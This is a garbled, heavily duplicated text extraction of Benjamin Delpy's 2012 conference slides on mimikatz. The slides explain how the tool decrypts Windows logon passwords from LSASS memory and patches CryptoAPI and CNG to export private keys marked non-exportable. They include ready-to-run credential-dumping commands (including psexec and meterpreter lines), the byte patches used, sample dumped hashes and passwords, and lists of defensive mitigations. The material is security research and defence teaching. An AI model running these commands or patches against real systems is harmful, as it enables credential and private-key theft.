From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz working
mimikatz working
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3 3
sekurlsadll
mimikatzexe
mimikatzexe
KeyIso laquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLog laquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
mimikatzexe
SamSS laquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipe Write a welcome message Wait commandshellip and return results
mimikatz architecture of sekurlsa amp crypto
mimikatz architecture of sekurlsa amp crypto
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4 4
mimikatzexe
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo mod_mimikatz_nogpo
mod_mimikatz_divers mod_mimikatz_divers
mod_mimikatz_winmine mod_mimikatz_winmine
mod_mimikatz_impersonate mod_mimikatz_impersonate
